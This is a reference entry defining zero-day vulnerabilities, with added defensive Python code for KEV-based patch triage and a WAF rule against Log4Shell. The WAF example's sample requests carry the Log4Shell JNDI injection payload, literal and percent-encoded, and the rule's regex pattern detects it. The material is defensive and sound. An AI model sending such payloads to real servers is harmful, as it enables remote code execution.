Zero-Day

A zero-day is a vulnerability that is being exploited (or whose details are public) before the vendor has issued a patch.

Definition

"Zero-day" refers to a vulnerability for which the vendor has had zero days of notice — exploitation, or full technical disclosure, predates any official fix. The shorthand "0-day" means the same thing. Zero-days are the highest-urgency category for defenders because no upstream patch exists; mitigation depends on workarounds (configuration changes, WAF rules, disabling the affected feature) and on detection.

Zero-days that are exploited at scale (Log4Shell on day one, Microsoft Exchange's ProxyShell chains, Citrix Bleed) routinely cause widespread breach activity in the gap between first exploitation and patch availability. The CISA KEV catalog is one of the fastest signals that a vulnerability has been observed in the wild.
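Because KEV flags vulnerabilities that are already being exploited, one of the simplest defensive uses of it is to cross-check scanner findings against the feed and push KEV hits to the front of the patch queue. The following is an added example, not code from the original page: it indexes a KEV-style feed and ranks matching findings by ransomware use and remaining time to the catalog due date. The feed and the scanner findings below are constructed samples (the second catalog entry and the CVE ids other than CVE-2021-44228 are placeholders); the field names follow the public KEV JSON feed, and in practice you would download the real feed from cisa.gov and pass it to `load_kev`.

```python
"""Triage scanner findings against a CISA KEV-style feed (added example)."""
import json
from datetime import date

# Constructed sample in the KEV JSON layout. Dates are illustrative and
# the second entry is a placeholder, not a real CVE.
SAMPLE_KEV_JSON = json.dumps({
    "title": "sample catalog",
    "count": 2,
    "vulnerabilities": [
        {
            "cveID": "CVE-2021-44228",
            "vendorProject": "Apache",
            "product": "Log4j2",
            "dateAdded": "2021-12-10",
            "dueDate": "2021-12-24",
            "knownRansomwareCampaignUse": "Known",
        },
        {
            "cveID": "CVE-0000-0002",  # placeholder id
            "vendorProject": "ExampleVendor",
            "product": "ExampleProduct",
            "dateAdded": "2024-01-02",
            "dueDate": "2024-01-23",
            "knownRansomwareCampaignUse": "Unknown",
        },
    ],
})

# Constructed scanner output: CVE ids per host. Only one id is real.
SAMPLE_FINDINGS = {
    "web-01": ["CVE-2021-44228", "CVE-0000-0001"],  # CVE-0000-0001 is a placeholder
    "db-01": ["CVE-0000-0003"],                      # placeholder
}


def load_kev(feed_json: str) -> dict:
    """Index a KEV feed (JSON text) by CVE id."""
    data = json.loads(feed_json)
    return {entry["cveID"]: entry for entry in data["vulnerabilities"]}


def triage(findings: dict, kev: dict, today: date) -> list:
    """Return the findings present in KEV, most urgent first.

    Ordering: entries with known ransomware use first, then by the number
    of days left until the KEV due date (negative means overdue).
    """
    hits = []
    for host, cves in findings.items():
        for cve in cves:
            entry = kev.get(cve)
            if entry is None:
                continue  # not in KEV: still a finding, just not a known-exploited one
            due = date.fromisoformat(entry["dueDate"])
            hits.append({
                "host": host,
                "cve": cve,
                "product": f'{entry["vendorProject"]} {entry["product"]}',
                "ransomware": entry.get("knownRansomwareCampaignUse") == "Known",
                "days_to_due": (due - today).days,
            })
    hits.sort(key=lambda h: (not h["ransomware"], h["days_to_due"]))
    return hits


if __name__ == "__main__":
    kev = load_kev(SAMPLE_KEV_JSON)
    for hit in triage(SAMPLE_FINDINGS, kev, date(2021, 12, 20)):
        flag = "RANSOMWARE " if hit["ransomware"] else ""
        print(f'{hit["host"]}: {hit["cve"]} ({hit["product"]}) {flag}due in {hit["days_to_due"]}d')
```

The due date is the catalog's own deadline for federal agencies; it is used here only as a convenient urgency signal, and findings that are not in KEV still need normal handling.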

Mitigation

Mitigation is class-specific. Defenders rely on virtual patching (WAF / IDS signatures), defence-in-depth, and accelerated deployment of the eventual fix.
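Virtual patching means putting a request-level rule in front of an application that cannot yet be patched. The example below is added here and is not code from the original page: it models a WAF-style rule for the page's own example, Log4Shell (CVE-2021-44228), by rejecting inbound requests that carry the JNDI lookup syntax in any path, query, header or body field. The request shape (a plain dict) and the sample requests are constructed for the example.

```python
"""WAF-style virtual patch for the Log4Shell lookup string (added example)."""
import re
from urllib.parse import unquote

# Indicator for the Log4j JNDI lookup syntax. Matching runs on a normalised
# copy of each value (URL-decoded, lower-cased) so case and percent-encoding
# variants of the same string are caught by one rule.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:")


def normalise(value: str) -> str:
    """URL-decode twice (covers double encoding) and fold case."""
    return unquote(unquote(value)).lower()


def is_blocked(request: dict) -> tuple:
    """Return (blocked, reason) for a request dict with optional keys
    'path', 'query', 'body' (str) and 'headers' (dict of str -> str)."""
    fields = [
        ("path", request.get("path", "")),
        ("query", request.get("query", "")),
        ("body", request.get("body", "")),
    ]
    fields += [(f"header:{name}", value) for name, value in request.get("headers", {}).items()]
    for name, value in fields:
        if JNDI_LOOKUP.search(normalise(value)):
            return True, f"CVE-2021-44228 lookup pattern in {name}"
    return False, ""


def filter_requests(requests: list) -> list:
    """Apply the rule to a batch and return one (blocked, reason) per request."""
    return [is_blocked(r) for r in requests]


# Constructed sample traffic: one benign request, one with the literal
# lookup string in a header, one with the same string percent-encoded
# in the query.
SAMPLE_REQUESTS = [
    {"path": "/login", "query": "next=/home", "headers": {"User-Agent": "Mozilla/5.0"}},
    {"path": "/login", "query": "", "headers": {"User-Agent": "${jndi:ldap://example.invalid/x}"}},
    {"path": "/search", "query": "q=%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fx%7D", "headers": {}},
]


if __name__ == "__main__":
    for req, (blocked, reason) in zip(SAMPLE_REQUESTS, filter_requests(SAMPLE_REQUESTS)):
        print("BLOCK" if blocked else "ALLOW", req["path"], reason)
```

A literal-string rule like this is a stopgap: it buys time until the real fix is deployed, and it needs to be paired with logging of what it blocks so the same events feed detection. Its limits are those of any signature, since it only matches the forms of the string it was written for, which is why the page lists it alongside defence-in-depth rather than as a replacement for the patch.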

Examples

  • CVE-2021-44228 — Log4Shell, exploited in the wild before the patch was widely deployed.
